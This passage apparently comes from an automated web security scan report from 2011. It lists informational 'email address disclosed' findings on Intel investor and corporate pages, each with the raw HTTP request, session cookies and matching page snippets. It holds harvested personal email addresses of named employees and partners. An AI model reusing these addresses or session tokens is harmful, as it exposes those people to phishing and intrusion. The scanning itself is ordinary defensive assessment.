Date: Sat, 05 Feb 2011 23:16:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<html>
<head>
<style type="text/css">
<!--
html, body, p {font-family: arial, helvetical, sans-serif;font-size: 12px;}
h1 {font-size: 14px;}
-->
</style>

<script language="Javascript">

   
...[SNIP]...
<a href=\"mailto:webmaster@shareholder.com?subject=" + escape("Error on page ") + document.location.host + escape("/releasedetail.cfm") + "&body=%0D%0A%0D%0A%0D%0AQueryString:%20" + escape(location.search) + "%0D%0AReferring%20Page:%20" + esca
...[SNIP]...

19.37. http://www.intc.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /releasedetail.cfm

Issue detail

The following email addresses were disclosed in the response:
  • cmulloy@intel.com
  • mark.h.henninger@intel.com

Request

GET /releasedetail.cfm?ReleaseID=546454&ReleasesType=Home&ReleasesType=Home HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A58%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:58 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:cmulloy@intel.com">cmulloy@intel.com</a>
...[SNIP]...
<a href="mailto:mark.h.henninger@intel.com">mark.h.henninger@intel.com</a>
...[SNIP]...

19.38. http://www.intc.com/shareServices.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /shareServices.cfm

Issue detail

The following email address was disclosed in the response:
  • web.queries@computershare.com

Request

GET /shareServices.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A07%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:08 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:08 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:08 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:web.queries@computershare.com">web.queries@computershare.com</a>
...[SNIP]...

19.39. http://www.intc.com/sitewide/js/jquery-plugins.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /sitewide/js/jquery-plugins.js

Issue detail

The following email address was disclosed in the response:
  • ganeshread@gmail.com

Request

GET /sitewide/js/jquery-plugins.js HTTP/1.1
Host: www.intc.com
Proxy-Connection: keep-alive
Referer: http://www.intc.com/index.cfm?iid=ftr+invrel
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NOMOBILE=0; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://www.intc.com/sitewide/js/jquery-plugins.js
Last-Modified: Fri, 26 Feb 2010 22:09:00 GMT
Accept-Ranges: bytes
ETag: "0664e4c30b7ca1:9339d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:12:57 GMT
Content-Length: 15319

/**
**********************************************************************************
PLEASE NOTE!
THIS IS A MODIFIED VERSION OF JCAROUSELLITE TO ALLOW FOR "PAUSE" FUNCTIONALITY.
http://www.erikho
...[SNIP]...
2 callbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext: null,

...[SNIP]...

19.40. http://www.intel.com/about/companyinfo/policy/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/policy/index.htm

Issue detail

The following email address was disclosed in the response:
  • tom.waldrop@intel.com

Request

GET /about/companyinfo/policy/index.htm?iid=subhdr+info_policy HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:39 GMT
Content-Length: 28058
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:tom.waldrop@intel.com">
...[SNIP]...
<a href="mailto:tom.waldrop@intel.com">
...[SNIP]...

19.41. http://www.intel.com/about/corporateresponsibility/foundation/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/foundation/index.htm

Issue detail

The following email address was disclosed in the response:
  • intel.foundation@intel.com

Request

GET /about/corporateresponsibility/foundation/index.htm?iid=subhdr+cr_foundation HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:33 GMT
Content-Length: 31901
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:intel.foundation@intel.com" title="Contact Intel Foundation">
...[SNIP]...

19.42. http://www.intel.com/business/vpro/alliance/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/vpro/alliance/index.htm

Issue detail

The following email addresses were disclosed in the response:
  • MOBusinessOffice@atosorigin.com
  • bridget.karlin@compucom.com
  • criley@syssrc.com
  • cspencer@enpointe.com
  • cthorsen@pdspc.com
  • jason.livingston@be-intuitive.com
  • lbaliak@lenovo.com
  • lorric@lenovo.com
  • mneff@advancedmarketplace.com
  • sales@binary.ag
  • sflahert@syssrc.com
  • vpro@valerent.com

Request

GET /business/vpro/alliance/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel vPro Technology Alliance</title>

   <link rel="
...[SNIP]...
<a href="mailto:mneff@advancedmarketplace.com"><strong>mneff@advancedmarketplace.com</strong>
...[SNIP]...
<a href="mailto:MOBusinessOffice@atosorigin.com "><strong>MOBusinessOffice@atosorigin.com</strong>
...[SNIP]...
<a href="mailto:sales@binary.ag"><strong>sales@binary.ag</strong>
...[SNIP]...
<a href="mailto:bridget.karlin@compucom.com"><strong>bridget.karlin@compucom.com</strong>
...[SNIP]...
<a href="mailto:cspencer@enpointe.com"><strong>cspencer@enpointe.com</strong>
...[SNIP]...
<a href="mailto:jason.livingston@be-intuitive.com"><strong>jason.livingston@be-intuitive.com</strong>
...[SNIP]...
<a href="mailto:lorric@lenovo.com"><strong>lorric@lenovo.com</strong>
...[SNIP]...
<a href="mailto:lbaliak@lenovo.com"><strong>lbaliak@lenovo.com</strong>
...[SNIP]...
<a href="mailto:cthorsen@pdspc.com"><strong>cthorsen@pdspc.com</strong>
...[SNIP]...
<a href="mailto:criley@syssrc.com"><strong>criley@syssrc.com</strong>
...[SNIP]...
<a href="mailto:sflahert@syssrc.com"><strong>sflahert@syssrc.com</strong>
...[SNIP]...
<a href="mailto:vpro@valerent.com"><strong>vpro@valerent.com</strong>
...[SNIP]...

19.43. http://www.intel.com/cd/corporate/pressroom/apac/zho/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/corporate/pressroom/apac/zho/index.htm

Issue detail

The following email address was disclosed in the response:
  • china.pr@intel.com

Request

GET /cd/corporate/pressroom/apac/zho/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G02
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:27 GMT
Date: Sat, 05 Feb 2011 23:18:27 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35146

...<html xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="re
...[SNIP]...
<a href="mailto:china.pr@intel.com">
...[SNIP]...

19.44. http://www.intel.com/corporate/europe/emea/irl/intel/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /corporate/europe/emea/irl/intel/index.htm

Issue detail

The following email address was disclosed in the response:
  • ireland.esc.hire@intel.com

Request

GET /corporate/europe/emea/irl/intel/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:21 GMT
Content-Length: 24236
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Intel Ireland</title>
<meta http-equiv='Content-T
...[SNIP]...
<a href="mailto:ireland.esc.hire@intel.com">
...[SNIP]...

19.45. http://www.intel.com/embedded/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /embedded/index.htm

Issue detail

The following email address was disclosed in the response:
  • sam@sam3000.com

Request

GET /embedded/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<meta ht
...[SNIP]...
riable Value>');lpAddVars('page','Title','');lpAddVars('visitor','FirstName','Sam');lpAddVars('visitor','BusinessID','');lpAddVars('visitor','BusinessName','Fusion Media');lpAddVars('visitor','Email','sam@sam3000.com');lpAddVars('visitor','LoginID','sam@sam3000.com');lpAddVars('visitor','MemberStatus','Privileged');
       </script>
...[SNIP]...

19.46. http://www.intel.com/espanol/pressroom/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /espanol/pressroom/index.htm

Issue detail

The following email addresses were disclosed in the response:
  • anaite.hernandez@bm.com
  • anator@creativaempresarial.com
  • claudiaa@fidal-amlat.org
  • francisca.oliva@bm.com
  • gabriel.leonardo.andriollo@bm.com
  • itzel.castellanos@bm.com
  • jahiro.polo@bm.com
  • manuela.munoz@bm.com
  • marcela.vaccaro@bm.com
  • natalia.arbex@bm.com
  • raquel.golcher.beirute@intel.com
  • teresa.menendez@yr.com

Request

GET /espanol/pressroom/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
